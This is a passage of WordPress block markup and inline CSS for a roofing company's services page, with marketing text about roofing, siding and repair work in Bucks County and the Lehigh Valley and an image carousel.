{\"contentWidth\":\"full_width\",\"blockId\":\"60b023b9-e8c3-43e6-89ba-c3dfbd99479c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a687cc3b-6428-4919-81c1-fb1cd829e749\"} -->\n<style type=\"text/css\"> .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a687cc3b-6428-4919-81c1-fb1cd829e749 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"8e161f0c-c998-4842-8873-8f192f3cb764\"} -->\n<style type=\"text/css\"> .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8e161f0c-c998-4842-8873-8f192f3cb764\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"6a2bf94f-4d60-433a-b525-d53bf9619216\"} -->\n<style type=\"text/css\"> .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a2bf94f-4d60-433a-b525-d53bf9619216\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"1a6b31cd-8a87-4edc-99f2-33dd2b097132\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-1a6b31cd-8a87-4edc-99f2-33dd2b097132\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roofing And Siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Dunrite Roofing has been serving the surrounding areas for over 30 years</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Bringing more than 30 years of experience to every job, Stork &amp; Sons Roof Maintenance provides reliable roofing in Bucks County and the surrounding Lehigh Valley areas. Our company is family owned and operated, and you can count on us for roofing, siding, and stucco services. We are passionate about the work that we do and pride ourselves on delivering high-quality work at fair, upfront, and honest pricing. We also specialize in siding and roofing repairs for those home that do not need a full replacement just yet. Our roofing experts work with all types of materials. including shingles, flat roofs, and siding. We do tear-offs and cleanups.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When you need fast, dependable results for your roof or siding, call Stork &amp; Sons Roof Maintenance today for a fast, fair, and free estimate!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d5c61675-ddb2-4433-a568-128785b48d5b\"} -->\n<style type=\"text/css\"> .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d5c61675-ddb2-4433-a568-128785b48d5b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"72780545-3bc2-4038-8814-1dd9138d037c\"} -->\n<style type=\"text/css\"> .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72780545-3bc2-4038-8814-1dd9138d037c\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"084a0777-f0fe-40d8-8160-5e5511fafb42\"} -->\n<style type=\"text/css\"> .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/1.jpg\" alt=\"\" data-id=\"467\" data-link=\"https://cteisys.com/services/repairs/attachment/1/\" class=\"wp-image-467\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/2.jpg\" alt=\"\" data-id=\"468\" data-link=\"https://cteisys.com/services/repairs/attachment/2/\" class=\"wp-image-468\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/3.jpg\" alt=\"\" data-id=\"469\" data-link=\"https://cteisys.com/services/repairs/attachment/3/\" class=\"wp-image-469\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"bad42304-f956-4ff6-a71d-3d0927546977\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-bad42304-f956-4ff6-a71d-3d0927546977\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Determining the underlying issue is critical when diagnosing a roof repair. We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8f988807-9a52-467a-ae6e-048f9f4c3534\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8f988807-9a52-467a-ae6e-048f9f4c3534 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d7963526-9288-4aa2-9602-2bca93be416b\"} -->\n<style type=\"text/css\"> .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d7963526-9288-4aa2-9602-2bca93be416b 